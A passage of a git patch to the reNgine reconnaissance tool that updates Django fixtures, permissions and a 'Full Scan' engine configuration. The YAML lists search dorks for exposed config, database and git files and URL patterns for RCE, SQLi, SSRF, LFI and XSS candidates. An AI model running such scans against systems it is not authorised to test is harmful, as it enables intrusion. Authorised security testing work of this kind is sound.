From 20823c058de1ef947568e9beade5058cb18da073 Mon Sep 17 00:00:00 2001 From: psyray Date: Wed, 13 Nov 2024 11:03:24 +0100 Subject: [PATCH] refactor: update fixtures and permissions, remove unused data - Removed extensive data from targetApp.json, including historical IPs, related domains, registrars, domain registrations, WHOIS status, nameservers, DNS records, and domain info. - Updated auth.json to modify permission names and codenames, and removed several user and group entries. - Added new todo notes in recon_note.json and updated existing ones. - Updated dashboard.json to modify project details and remove unused settings. - Modified scanEngine.json to update YAML configurations and add a new interesting lookup model. - Enabled remote debugging in docker-compose.dev.yml. - Updated a test in test_vulnerability.py to patch a different method for generating vulnerability reports --- web/api/tests/test_vulnerability.py | 2 +- web/dashboard/fixtures/dashboard.json | 31 +- web/fixtures/auth.json | 429 +- web/fixtures/contenttypes.json | 482 + web/fixtures/rolepermissions.json | 2 + web/recon_note/fixtures/recon_note.json | 32 +- web/scanEngine/fixtures/scanEngine.json | 24 +- web/startScan/fixtures/startScan.json | 67928 +++++++++++++++++++++- web/targetApp/fixtures/targetApp.json | 509 +- 9 files changed, 66745 insertions(+), 2694 deletions(-) create mode 100644 web/fixtures/contenttypes.json create mode 100644 web/fixtures/rolepermissions.json diff --git a/web/api/tests/test_vulnerability.py b/web/api/tests/test_vulnerability.py index a2c78a0b..52acd348 100644 --- a/web/api/tests/test_vulnerability.py +++ b/web/api/tests/test_vulnerability.py @@ -88,7 +88,7 @@ def setUp(self): self.data_generator.create_endpoint() self.data_generator.create_vulnerability() - @patch("reNgine.tasks.llm_vulnerability_description.apply_async") + @patch("reNgine.tasks.llm_vulnerability_report.apply_async") def test_get_vulnerability_report(self, mock_apply_async): """Test generating a vulnerability report.""" mock_task = MagicMock() diff --git a/web/dashboard/fixtures/dashboard.json b/web/dashboard/fixtures/dashboard.json index 75dde2cf..da78d6e4 100644 --- a/web/dashboard/fixtures/dashboard.json +++ b/web/dashboard/fixtures/dashboard.json @@ -4,34 +4,21 @@ "pk": 1, "fields": { "name": "Default", + "description": null, "slug": "default", - "insert_date": "2024-09-03T21:23:21.459Z" + "insert_date": "2024-11-13T01:59:02.841Z", + "users": [] } }, { "model": "dashboard.project", - "pk": 2, + "pk": 34, "fields": { - "name": "My Project", - "slug": "my-project", - "insert_date": "2024-09-04T00:32:08.839Z" - } -}, -{ - "model": "dashboard.project", - "pk": 3, - "fields": { - "name": "My Other Project", - "slug": "my-other-project", - "insert_date": "2024-09-04T00:32:31.475Z" - } -}, -{ - "model": "dashboard.ollamasettings", - "pk": 1, - "fields": { - "selected_model": "gpt-3", - "use_ollama": false + "name": "Another project", + "description": null, + "slug": "another-project", + "insert_date": "2024-11-13T03:05:09.478Z", + "users": [] } } ] diff --git a/web/fixtures/auth.json b/web/fixtures/auth.json index 565501b0..9be82d33 100644 --- a/web/fixtures/auth.json +++ b/web/fixtures/auth.json @@ -1551,324 +1551,324 @@ "model": "auth.permission", "pk": 173, "fields": { - "name": "Can add vulnerability reference", + "name": "Can add vulnerability tags", "content_type": 44, - "codename": "add_vulnerabilityreference" + "codename": "add_vulnerabilitytags" } }, { "model": "auth.permission", "pk": 174, "fields": { - "name": "Can change vulnerability reference", + "name": "Can change vulnerability tags", "content_type": 44, - "codename": "change_vulnerabilityreference" + "codename": "change_vulnerabilitytags" } }, { "model": "auth.permission", "pk": 175, "fields": { - "name": "Can delete vulnerability reference", + "name": "Can delete vulnerability tags", "content_type": 44, - "codename": "delete_vulnerabilityreference" + "codename": "delete_vulnerabilitytags" } }, { "model": "auth.permission", "pk": 176, "fields": { - "name": "Can view vulnerability reference", + "name": "Can view vulnerability tags", "content_type": 44, - "codename": "view_vulnerabilityreference" + "codename": "view_vulnerabilitytags" } }, { "model": "auth.permission", "pk": 177, "fields": { - "name": "Can add vulnerability tags", + "name": "Can add directory file", "content_type": 45, - "codename": "add_vulnerabilitytags" + "codename": "add_directoryfile" } }, { "model": "auth.permission", "pk": 178, "fields": { - "name": "Can change vulnerability tags", + "name": "Can change directory file", "content_type": 45, - "codename": "change_vulnerabilitytags" + "codename": "change_directoryfile" } }, { "model": "auth.permission", "pk": 179, "fields": { - "name": "Can delete vulnerability tags", + "name": "Can delete directory file", "content_type": 45, - "codename": "delete_vulnerabilitytags" + "codename": "delete_directoryfile" } }, { "model": "auth.permission", "pk": 180, "fields": { - "name": "Can view vulnerability tags", + "name": "Can view directory file", "content_type": 45, - "codename": "view_vulnerabilitytags" + "codename": "view_directoryfile" } }, { "model": "auth.permission", "pk": 181, "fields": { - "name": "Can add directory file", + "name": "Can add directory scan", "content_type": 46, - "codename": "add_directoryfile" + "codename": "add_directoryscan" } }, { "model": "auth.permission", "pk": 182, "fields": { - "name": "Can change directory file", + "name": "Can change directory scan", "content_type": 46, - "codename": "change_directoryfile" + "codename": "change_directoryscan" } }, { "model": "auth.permission", "pk": 183, "fields": { - "name": "Can delete directory file", + "name": "Can delete directory scan", "content_type": 46, - "codename": "delete_directoryfile" + "codename": "delete_directoryscan" } }, { "model": "auth.permission", "pk": 184, "fields": { - "name": "Can view directory file", + "name": "Can view directory scan", "content_type": 46, - "codename": "view_directoryfile" + "codename": "view_directoryscan" } }, { "model": "auth.permission", "pk": 185, "fields": { - "name": "Can add directory scan", + "name": "Can add cve id", "content_type": 47, - "codename": "add_directoryscan" + "codename": "add_cveid" } }, { "model": "auth.permission", "pk": 186, "fields": { - "name": "Can change directory scan", + "name": "Can change cve id", "content_type": 47, - "codename": "change_directoryscan" + "codename": "change_cveid" } }, { "model": "auth.permission", "pk": 187, "fields": { - "name": "Can delete directory scan", + "name": "Can delete cve id", "content_type": 47, - "codename": "delete_directoryscan" + "codename": "delete_cveid" } }, { "model": "auth.permission", "pk": 188, "fields": { - "name": "Can view directory scan", + "name": "Can view cve id", "content_type": 47, - "codename": "view_directoryscan" + "codename": "view_cveid" } }, { "model": "auth.permission", "pk": 189, "fields": { - "name": "Can add cve id", + "name": "Can add cwe id", "content_type": 48, - "codename": "add_cveid" + "codename": "add_cweid" } }, { "model": "auth.permission", "pk": 190, "fields": { - "name": "Can change cve id", + "name": "Can change cwe id", "content_type": 48, - "codename": "change_cveid" + "codename": "change_cweid" } }, { "model": "auth.permission", "pk": 191, "fields": { - "name": "Can delete cve id", + "name": "Can delete cwe id", "content_type": 48, - "codename": "delete_cveid" + "codename": "delete_cweid" } }, { "model": "auth.permission", "pk": 192, "fields": { - "name": "Can view cve id", + "name": "Can view cwe id", "content_type": 48, - "codename": "view_cveid" + "codename": "view_cweid" } }, { "model": "auth.permission", "pk": 193, "fields": { - "name": "Can add cwe id", + "name": "Can add waf", "content_type": 49, - "codename": "add_cweid" + "codename": "add_waf" } }, { "model": "auth.permission", "pk": 194, "fields": { - "name": "Can change cwe id", + "name": "Can change waf", "content_type": 49, - "codename": "change_cweid" + "codename": "change_waf" } }, { "model": "auth.permission", "pk": 195, "fields": { - "name": "Can delete cwe id", + "name": "Can delete waf", "content_type": 49, - "codename": "delete_cweid" + "codename": "delete_waf" } }, { "model": "auth.permission", "pk": 196, "fields": { - "name": "Can view cwe id", + "name": "Can view waf", "content_type": 49, - "codename": "view_cweid" + "codename": "view_waf" } }, { "model": "auth.permission", "pk": 197, "fields": { - "name": "Can add waf", + "name": "Can add country iso", "content_type": 50, - "codename": "add_waf" + "codename": "add_countryiso" } }, { "model": "auth.permission", "pk": 198, "fields": { - "name": "Can change waf", + "name": "Can change country iso", "content_type": 50, - "codename": "change_waf" + "codename": "change_countryiso" } }, { "model": "auth.permission", "pk": 199, "fields": { - "name": "Can delete waf", + "name": "Can delete country iso", "content_type": 50, - "codename": "delete_waf" + "codename": "delete_countryiso" } }, { "model": "auth.permission", "pk": 200, "fields": { - "name": "Can view waf", + "name": "Can view country iso", "content_type": 50, - "codename": "view_waf" + "codename": "view_countryiso" } }, { "model": "auth.permission", "pk": 201, "fields": { - "name": "Can add country iso", + "name": "Can add command", "content_type": 51, - "codename": "add_countryiso" + "codename": "add_command" } }, { "model": "auth.permission", "pk": 202, "fields": { - "name": "Can change country iso", + "name": "Can change command", "content_type": 51, - "codename": "change_countryiso" + "codename": "change_command" } }, { "model": "auth.permission", "pk": 203, "fields": { - "name": "Can delete country iso", + "name": "Can delete command", "content_type": 51, - "codename": "delete_countryiso" + "codename": "delete_command" } }, { "model": "auth.permission", "pk": 204, "fields": { - "name": "Can view country iso", + "name": "Can view command", "content_type": 51, - "codename": "view_countryiso" + "codename": "view_command" } }, { "model": "auth.permission", "pk": 205, "fields": { - "name": "Can add command", + "name": "Can add s3 bucket", "content_type": 52, - "codename": "add_command" + "codename": "add_s3bucket" } }, { "model": "auth.permission", "pk": 206, "fields": { - "name": "Can change command", + "name": "Can change s3 bucket", "content_type": 52, - "codename": "change_command" + "codename": "change_s3bucket" } }, { "model": "auth.permission", "pk": 207, "fields": { - "name": "Can delete command", + "name": "Can delete s3 bucket", "content_type": 52, - "codename": "delete_command" + "codename": "delete_s3bucket" } }, { "model": "auth.permission", "pk": 208, "fields": { - "name": "Can view command", + "name": "Can view s3 bucket", "content_type": 52, - "codename": "view_command" + "codename": "view_s3bucket" } }, { @@ -1910,438 +1910,271 @@ { "model": "auth.permission", "pk": 213, - "fields": { - "name": "Can add s3 bucket", - "content_type": 54, - "codename": "add_s3bucket" - } -}, -{ - "model": "auth.permission", - "pk": 214, - "fields": { - "name": "Can change s3 bucket", - "content_type": 54, - "codename": "change_s3bucket" - } -}, -{ - "model": "auth.permission", - "pk": 215, - "fields": { - "name": "Can delete s3 bucket", - "content_type": 54, - "codename": "delete_s3bucket" - } -}, -{ - "model": "auth.permission", - "pk": 216, - "fields": { - "name": "Can view s3 bucket", - "content_type": 54, - "codename": "view_s3bucket" - } -}, -{ - "model": "auth.permission", - "pk": 217, "fields": { "name": "Can add todo note", - "content_type": 55, + "content_type": 54, "codename": "add_todonote" } }, { "model": "auth.permission", - "pk": 218, + "pk": 214, "fields": { "name": "Can change todo note", - "content_type": 55, + "content_type": 54, "codename": "change_todonote" } }, { "model": "auth.permission", - "pk": 219, + "pk": 215, "fields": { "name": "Can delete todo note", - "content_type": 55, + "content_type": 54, "codename": "delete_todonote" } }, { "model": "auth.permission", - "pk": 220, + "pk": 216, "fields": { "name": "Can view todo note", - "content_type": 55, + "content_type": 54, "codename": "view_todonote" } }, { "model": "auth.permission", - "pk": 221, + "pk": 217, "fields": { "name": "Can add crontab", - "content_type": 56, + "content_type": 55, "codename": "add_crontabschedule" } }, { "model": "auth.permission", - "pk": 222, + "pk": 218, "fields": { "name": "Can change crontab", - "content_type": 56, + "content_type": 55, "codename": "change_crontabschedule" } }, { "model": "auth.permission", - "pk": 223, + "pk": 219, "fields": { "name": "Can delete crontab", - "content_type": 56, + "content_type": 55, "codename": "delete_crontabschedule" } }, { "model": "auth.permission", - "pk": 224, + "pk": 220, "fields": { "name": "Can view crontab", - "content_type": 56, + "content_type": 55, "codename": "view_crontabschedule" } }, { "model": "auth.permission", - "pk": 225, + "pk": 221, "fields": { "name": "Can add interval", - "content_type": 57, + "content_type": 56, "codename": "add_intervalschedule" } }, { "model": "auth.permission", - "pk": 226, + "pk": 222, "fields": { "name": "Can change interval", - "content_type": 57, + "content_type": 56, "codename": "change_intervalschedule" } }, { "model": "auth.permission", - "pk": 227, + "pk": 223, "fields": { "name": "Can delete interval", - "content_type": 57, + "content_type": 56, "codename": "delete_intervalschedule" } }, { "model": "auth.permission", - "pk": 228, + "pk": 224, "fields": { "name": "Can view interval", - "content_type": 57, + "content_type": 56, "codename": "view_intervalschedule" } }, { "model": "auth.permission", - "pk": 229, + "pk": 225, "fields": { "name": "Can add periodic task", - "content_type": 58, + "content_type": 57, "codename": "add_periodictask" } }, { "model": "auth.permission", - "pk": 230, + "pk": 226, "fields": { "name": "Can change periodic task", - "content_type": 58, + "content_type": 57, "codename": "change_periodictask" } }, { "model": "auth.permission", - "pk": 231, + "pk": 227, "fields": { "name": "Can delete periodic task", - "content_type": 58, + "content_type": 57, "codename": "delete_periodictask" } }, { "model": "auth.permission", - "pk": 232, + "pk": 228, "fields": { "name": "Can view periodic task", - "content_type": 58, + "content_type": 57, "codename": "view_periodictask" } }, { "model": "auth.permission", - "pk": 233, + "pk": 229, "fields": { "name": "Can add periodic tasks", - "content_type": 59, + "content_type": 58, "codename": "add_periodictasks" } }, { "model": "auth.permission", - "pk": 234, + "pk": 230, "fields": { "name": "Can change periodic tasks", - "content_type": 59, + "content_type": 58, "codename": "change_periodictasks" } }, { "model": "auth.permission", - "pk": 235, + "pk": 231, "fields": { "name": "Can delete periodic tasks", - "content_type": 59, + "content_type": 58, "codename": "delete_periodictasks" } }, { "model": "auth.permission", - "pk": 236, + "pk": 232, "fields": { "name": "Can view periodic tasks", - "content_type": 59, + "content_type": 58, "codename": "view_periodictasks" } }, { "model": "auth.permission", - "pk": 237, + "pk": 233, "fields": { "name": "Can add solar event", - "content_type": 60, + "content_type": 59, "codename": "add_solarschedule" } }, { "model": "auth.permission", - "pk": 238, + "pk": 234, "fields": { "name": "Can change solar event", - "content_type": 60, + "content_type": 59, "codename": "change_solarschedule" } }, { "model": "auth.permission", - "pk": 239, + "pk": 235, "fields": { "name": "Can delete solar event", - "content_type": 60, + "content_type": 59, "codename": "delete_solarschedule" } }, { "model": "auth.permission", - "pk": 240, + "pk": 236, "fields": { "name": "Can view solar event", - "content_type": 60, + "content_type": 59, "codename": "view_solarschedule" } }, { "model": "auth.permission", - "pk": 241, + "pk": 237, "fields": { "name": "Can add clocked", - "content_type": 61, + "content_type": 60, "codename": "add_clockedschedule" } }, { "model": "auth.permission", - "pk": 242, + "pk": 238, "fields": { "name": "Can change clocked", - "content_type": 61, + "content_type": 60, "codename": "change_clockedschedule" } }, { "model": "auth.permission", - "pk": 243, + "pk": 239, "fields": { "name": "Can delete clocked", - "content_type": 61, + "content_type": 60, "codename": "delete_clockedschedule" } }, { "model": "auth.permission", - "pk": 244, + "pk": 240, "fields": { "name": "Can view clocked", - "content_type": 61, + "content_type": 60, "codename": "view_clockedschedule" } }, -{ - "model": "auth.permission", - "pk": 245, - "fields": { - "name": "Modify Scan Report", - "content_type": 4, - "codename": "modify_scan_report" - } -}, -{ - "model": "auth.permission", - "pk": 246, - "fields": { - "name": "Modify Scan Configurations", - "content_type": 4, - "codename": "modify_scan_configurations" - } -}, -{ - "model": "auth.permission", - "pk": 247, - "fields": { - "name": "Modify Wordlists", - "content_type": 4, - "codename": "modify_wordlists" - } -}, -{ - "model": "auth.permission", - "pk": 248, - "fields": { - "name": "Modify Targets", - "content_type": 4, - "codename": "modify_targets" - } -}, -{ - "model": "auth.permission", - "pk": 249, - "fields": { - "name": "Initiate Scans Subscans", - "content_type": 4, - "codename": "initiate_scans_subscans" - } -}, -{ - "model": "auth.permission", - "pk": 250, - "fields": { - "name": "Modify Scan Results", - "content_type": 4, - "codename": "modify_scan_results" - } -}, -{ - "model": "auth.permission", - "pk": 251, - "fields": { - "name": "Modify Interesting Lookup", - "content_type": 4, - "codename": "modify_interesting_lookup" - } -}, -{ - "model": "auth.group", - "pk": 1, - "fields": { - "name": "penetration_tester", - "permissions": [] - } -}, -{ - "model": "auth.group", - "pk": 2, - "fields": { - "name": "auditor", - "permissions": [] - } -}, { "model": "auth.user", "pk": 1, "fields": { - "password": "pbkdf2_sha256$260000$CqI5854efTfSzMuRGapUcC$czVBVTOeS0doZ2xNWBTDxIPbyAvkef+vB41oaDGNYDE=", - "last_login": "2024-09-03T21:23:15.084Z", + "password": "pbkdf2_sha256$260000$WrppgNE2XFSWfeCqKVIF0U$FM2wHJgt1Iw0dHZUGLiKtcMUWwyDFlo/Frsaz/jzJos=", + "last_login": "2024-11-13T01:58:59.003Z", "is_superuser": true, "username": "rengine", "first_name": "", "last_name": "", - "email": "rengine@example.com", + "email": "", "is_staff": true, "is_active": true, - "date_joined": "2024-09-03T21:22:52.707Z", + "date_joined": "2024-11-13T01:54:21.443Z", "groups": [], "user_permissions": [] } -}, -{ - "model": "auth.user", - "pk": 2, - "fields": { - "password": "pbkdf2_sha256$260000$CZZAPOMIBDEuFR6GWP44YY$zmorFyJzWeyX0+jnFnItiRwjsaPQ9S3g8KgqDNaluc0=", - "last_login": null, - "is_superuser": false, - "username": "pentest", - "first_name": "", - "last_name": "", - "email": "", - "is_staff": false, - "is_active": true, - "date_joined": "2024-09-04T00:31:18.262Z", - "groups": [ - 1 - ], - "user_permissions": [ - 249, - 251, - 246, - 245, - 250, - 248, - 247 - ] - } -}, -{ - "model": "auth.user", - "pk": 3, - "fields": { - "password": "pbkdf2_sha256$260000$8XXTKhzOwW3sDLL7kQmgjb$a1nISv6K/uW+KBw4yzQCkRJb6ydo7Nk/Y99RAqUGXQo=", - "last_login": null, - "is_superuser": false, - "username": "audit", - "first_name": "", - "last_name": "", - "email": "", - "is_staff": false, - "is_active": true, - "date_joined": "2024-09-04T00:31:43.172Z", - "groups": [ - 2 - ], - "user_permissions": [ - 251, - 245, - 250 - ] - } } ] diff --git a/web/fixtures/contenttypes.json b/web/fixtures/contenttypes.json new file mode 100644 index 00000000..30f1ccab --- /dev/null +++ b/web/fixtures/contenttypes.json @@ -0,0 +1,482 @@ +[ +{ + "model": "contenttypes.contenttype", + "pk": 1, + "fields": { + "app_label": "admin", + "model": "logentry" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 2, + "fields": { + "app_label": "auth", + "model": "permission" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 3, + "fields": { + "app_label": "auth", + "model": "group" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 4, + "fields": { + "app_label": "auth", + "model": "user" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 5, + "fields": { + "app_label": "contenttypes", + "model": "contenttype" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 6, + "fields": { + "app_label": "sessions", + "model": "session" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 7, + "fields": { + "app_label": "dashboard", + "model": "searchhistory" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 8, + "fields": { + "app_label": "dashboard", + "model": "project" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 9, + "fields": { + "app_label": "dashboard", + "model": "netlasapikey" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 10, + "fields": { + "app_label": "dashboard", + "model": "openaiapikey" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 11, + "fields": { + "app_label": "dashboard", + "model": "ollamasettings" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 12, + "fields": { + "app_label": "targetApp", + "model": "domain" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 13, + "fields": { + "app_label": "targetApp", + "model": "organization" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 14, + "fields": { + "app_label": "targetApp", + "model": "domaininfo" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 15, + "fields": { + "app_label": "targetApp", + "model": "domainregistration" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 16, + "fields": { + "app_label": "targetApp", + "model": "dnsrecord" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 17, + "fields": { + "app_label": "targetApp", + "model": "nameserver" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 18, + "fields": { + "app_label": "targetApp", + "model": "registrar" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 19, + "fields": { + "app_label": "targetApp", + "model": "whoisstatus" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 20, + "fields": { + "app_label": "targetApp", + "model": "historicalip" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 21, + "fields": { + "app_label": "targetApp", + "model": "relateddomain" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 22, + "fields": { + "app_label": "scanEngine", + "model": "configuration" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 23, + "fields": { + "app_label": "scanEngine", + "model": "enginetype" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 24, + "fields": { + "app_label": "scanEngine", + "model": "hackerone" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 25, + "fields": { + "app_label": "scanEngine", + "model": "installedexternaltool" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 26, + "fields": { + "app_label": "scanEngine", + "model": "interestinglookupmodel" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 27, + "fields": { + "app_label": "scanEngine", + "model": "notification" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 28, + "fields": { + "app_label": "scanEngine", + "model": "proxy" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 29, + "fields": { + "app_label": "scanEngine", + "model": "vulnerabilityreportsetting" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 30, + "fields": { + "app_label": "scanEngine", + "model": "wordlist" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 31, + "fields": { + "app_label": "startScan", + "model": "dork" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 32, + "fields": { + "app_label": "startScan", + "model": "email" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 33, + "fields": { + "app_label": "startScan", + "model": "employee" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 34, + "fields": { + "app_label": "startScan", + "model": "endpoint" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 35, + "fields": { + "app_label": "startScan", + "model": "ipaddress" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 36, + "fields": { + "app_label": "startScan", + "model": "port" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 37, + "fields": { + "app_label": "startScan", + "model": "scanhistory" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 38, + "fields": { + "app_label": "startScan", + "model": "subdomain" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 39, + "fields": { + "app_label": "startScan", + "model": "technology" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 40, + "fields": { + "app_label": "startScan", + "model": "vulnerability" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 41, + "fields": { + "app_label": "startScan", + "model": "subscan" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 42, + "fields": { + "app_label": "startScan", + "model": "scanactivity" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 43, + "fields": { + "app_label": "startScan", + "model": "metafinderdocument" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 44, + "fields": { + "app_label": "startScan", + "model": "vulnerabilitytags" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 45, + "fields": { + "app_label": "startScan", + "model": "directoryfile" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 46, + "fields": { + "app_label": "startScan", + "model": "directoryscan" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 47, + "fields": { + "app_label": "startScan", + "model": "cveid" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 48, + "fields": { + "app_label": "startScan", + "model": "cweid" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 49, + "fields": { + "app_label": "startScan", + "model": "waf" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 50, + "fields": { + "app_label": "startScan", + "model": "countryiso" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 51, + "fields": { + "app_label": "startScan", + "model": "command" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 52, + "fields": { + "app_label": "startScan", + "model": "s3bucket" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 53, + "fields": { + "app_label": "startScan", + "model": "llmvulnerabilityreport" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 54, + "fields": { + "app_label": "recon_note", + "model": "todonote" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 55, + "fields": { + "app_label": "django_celery_beat", + "model": "crontabschedule" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 56, + "fields": { + "app_label": "django_celery_beat", + "model": "intervalschedule" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 57, + "fields": { + "app_label": "django_celery_beat", + "model": "periodictask" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 58, + "fields": { + "app_label": "django_celery_beat", + "model": "periodictasks" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 59, + "fields": { + "app_label": "django_celery_beat", + "model": "solarschedule" + } +}, +{ + "model": "contenttypes.contenttype", + "pk": 60, + "fields": { + "app_label": "django_celery_beat", + "model": "clockedschedule" + } +} +] diff --git a/web/fixtures/rolepermissions.json b/web/fixtures/rolepermissions.json new file mode 100644 index 00000000..0d4f101c --- /dev/null +++ b/web/fixtures/rolepermissions.json @@ -0,0 +1,2 @@ +[ +] diff --git a/web/recon_note/fixtures/recon_note.json b/web/recon_note/fixtures/recon_note.json index 0e9be820..1892458d 100644 --- a/web/recon_note/fixtures/recon_note.json +++ b/web/recon_note/fixtures/recon_note.json @@ -3,11 +3,37 @@ "model": "recon_note.todonote", "pk": 1, "fields": { - "title": "Check for vuln", - "description": "There's a lot", + "title": "SQLi", + "description": "SQLi", "scan_history": 1, - "subdomain": 24, + "subdomain": 88, "is_done": false, + "is_important": true, + "project": 1 + } +}, +{ + "model": "recon_note.todonote", + "pk": 2, + "fields": { + "title": "XSS", + "description": "", + "scan_history": 1, + "subdomain": 88, + "is_done": false, + "is_important": false, + "project": 1 + } +}, +{ + "model": "recon_note.todonote", + "pk": 3, + "fields": { + "title": "SSRF", + "description": "", + "scan_history": 1, + "subdomain": 88, + "is_done": true, "is_important": false, "project": 1 } diff --git a/web/scanEngine/fixtures/scanEngine.json b/web/scanEngine/fixtures/scanEngine.json index f5223475..753a79da 100644 --- a/web/scanEngine/fixtures/scanEngine.json +++ b/web/scanEngine/fixtures/scanEngine.json @@ -4,8 +4,8 @@ "pk": 1, "fields": { "engine_name": "Full Scan", - "yaml_configuration": "subdomain_discovery: {\r\n 'uses_tools': ['subfinder', 'ctfr', 'sublist3r', 'tlsx', 'oneforall', 'netlas'],\r\n 'enable_http_crawl': true,\r\n 'threads': 30,\r\n 'timeout': 5,\r\n}\r\nhttp_crawl: {}\r\nport_scan: {\r\n 'enable_http_crawl': true,\r\n 'timeout': 5,\r\n # 'exclude_ports': [],\r\n # 'exclude_subdomains': [],\r\n 'ports': ['top-100'],\r\n 'rate_limit': 150,\r\n 'threads': 30,\r\n 'passive': false,\r\n # 'use_naabu_config': false,\r\n # 'enable_nmap': true,\r\n # 'nmap_cmd': '',\r\n # 'nmap_script': '',\r\n # 'nmap_script_args': ''\r\n}\r\nosint: {\r\n 'discover': [\r\n 'emails',\r\n 'metainfo',\r\n 'employees'\r\n ],\r\n 'dorks': [\r\n 'login_pages',\r\n 'admin_panels',\r\n 'dashboard_pages',\r\n 'stackoverflow',\r\n 'social_media',\r\n 'project_management',\r\n 'code_sharing',\r\n 'config_files',\r\n 'jenkins',\r\n 'wordpress_files',\r\n 'php_error',\r\n 'exposed_documents',\r\n 'db_files',\r\n 'git_exposed'\r\n ],\r\n 'intensity': 'normal',\r\n 'documents_limit': 50\r\n}\r\ndir_file_fuzz: {\r\n 'auto_calibration': true,\r\n 'enable_http_crawl': true,\r\n 'rate_limit': 150,\r\n 'extensions': [],\r\n 'follow_redirect': false,\r\n 'max_time': 0,\r\n 'match_http_status': [200, 204],\r\n 'recursive_level': 0,\r\n 'stop_on_error': false,\r\n 'timeout': 5,\r\n 'threads': 30,\r\n 'wordlist_name': 'default', # fuzz-Bo0oM\r\n}\r\nfetch_url: {\r\n 'uses_tools': ['gospider', 'hakrawler', 'waybackurls', 'katana', 'gau'],\r\n 'remove_duplicate_endpoints': true,\r\n 'duplicate_fields': ['content_length', 'page_title'],\r\n 'follow_redirect': false,\r\n 'enable_http_crawl': true,\r\n 'gf_patterns': ['debug_logic', 'idor', 'interestingEXT', 'interestingparams', 'interestingsubs', 'lfi', 'rce', 'redirect', 'sqli', 'ssrf', 'ssti', 'xss'],\r\n 'ignore_file_extensions': ['png', 'jpg', 'jpeg', 'gif', 'mp4', 'mpeg', 'mp3'],\r\n 'threads': 30\r\n}\r\nvulnerability_scan: {\r\n 'run_nuclei': true,\r\n 'run_dalfox': true,\r\n 'run_crlfuzz': true,\r\n 'enable_http_crawl': true,\r\n 'concurrency': 50,\r\n 'intensity': 'normal',\r\n 'rate_limit': 150,\r\n 'retries': 1,\r\n 'timeout': 5,\r\n 'fetch_llm_report': true,\r\n 'nuclei': {\r\n 'use_nuclei_config': false,\r\n 'severities': ['unknown', 'info', 'low', 'medium', 'high', 'critical']\r\n }\r\n}\r\nwaf_detection: {\r\n\r\n}\r\nscreenshot: {\r\n 'enable_http_crawl': true,\r\n 'intensity': 'normal',\r\n 'timeout': 10,\r\n 'threads': 40\r\n}\r\n\r\n# custom_header: \"Cookie: Test\"", - "default_engine": true + "yaml_configuration": "# Global vars for all tools\r\n#\r\n# Custom header - FFUF, Nuclei, Dalfox, CRL Fuzz, HTTPx, Fetch URL (Hakrawler, Katana, Gospider)\r\n# custom_header: {\r\n# 'Cookie':'Test',\r\n# 'User-Agent': 'Mozilla/5.0',\r\n# 'Custom-Header': 'My custom header'\r\n# }\r\n# 'user_agent': '' # Dalfox only\r\n# 'enable_http_crawl': true # All tools\r\n# 'timeout': 10 # Subdomain discovery, Screenshot, Port scan, FFUF, Nuclei \r\n# 'threads': 30 # All tools\r\n# 'rate_limit': 150 # Port scan, FFUF, Nuclei\r\n# 'intensity': 'normal' # Screenshot (grab only the root endpoints of each subdomain), Nuclei (reduce number of endpoints to scan), OSINT (not implemented yet)\r\n# 'retries': 1 # Nuclei\r\n\r\nsubdomain_discovery: {\r\n 'uses_tools': ['subfinder', 'ctfr', 'sublist3r', 'tlsx', 'oneforall', 'netlas'], # amass-passive, amass-active, All\r\n 'enable_http_crawl': true,\r\n 'threads': 30,\r\n 'timeout': 5,\r\n # 'use_subfinder_config': false,\r\n # 